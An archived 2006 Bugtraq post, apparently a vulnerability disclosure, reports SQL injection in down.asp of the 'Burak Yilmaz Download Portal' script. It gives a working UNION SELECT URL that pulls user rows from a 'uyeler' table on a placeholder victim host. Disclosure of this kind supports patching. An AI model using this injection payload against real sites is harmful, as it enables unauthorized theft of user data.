Burak Yilmaz Download Portal Sql Injection Vuln.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Burak Yilmaz Download Portal Sql Injection Vuln.
From: ShaFuq31@xxxxxxxxxxx
Date: 19 Dec 2006 19:50:47 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Burak Y&#305;lmaz Download Portal

# Script Download : http://maxiasp.com/sc_yorum.asp?scno=929

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | 
ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : down.asp

#Vuln :
http://www.victim.com/ScriptPath/down.asp?id=[SqL]
http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

Prev by Date: xss in Support Cards v1 ( oSTicket )
Next by Date: Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit
Previous by thread: xss in Support Cards v1 ( oSTicket )
Next by thread: Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit
Index(es):
- Date
- Thread